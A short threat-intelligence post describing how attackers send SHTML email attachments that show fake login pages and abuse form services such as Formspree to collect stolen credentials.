SHTML Phishing Attacks

@ducklah 17 May 2023

Threat Actor



The attacker has been abusing server-parsed HTML (SHTML) files. The SHTML files are commonly associated with web servers redirecting users to malicious, credential-stealing websites or display phishing forms locally within the browser to harvest user-sensitive information.

Attackers victimize users by distributing SHTML files as email attachments.The sentiments used in such phishing emails include a payment confirmation, invoice, shipment etc., The email contains a small thread of messages to make the recipient more curious to open the attachment.

When the SHTML attachment is clicked, it opens a blurred fake document with a login page in the browser. To read the document, however, the user must enter his/her credentials. In some cases, the email address is prefilled.

Attackers commonly use JavaScript in the SHTML attachments that will be used either to generate the malicious phishing form or to redirect or to hide malicious URLs and behavior.

Abusing submission form service:

Phishing attacks abuse static form service providers to steal sensitive user information, such as Formspree and Formspark is a back-end service that allows developers to easily add forms on their website without writing server-side code, it also handles form processing and storage. It takes HTML form submissions and sends the results to an email address.

The attackers use the URL as an action URL that defines where the form data will be sent. When the user enters the credentials and hits the “submit” button, the data is sent to Subsequently, forwards the information to the specified email address. To prevent the user from recognizing that they’ve just been phished, the attacker redirects the user’s browser to an unrelated error page that is associated with a legitimate website.


Last updated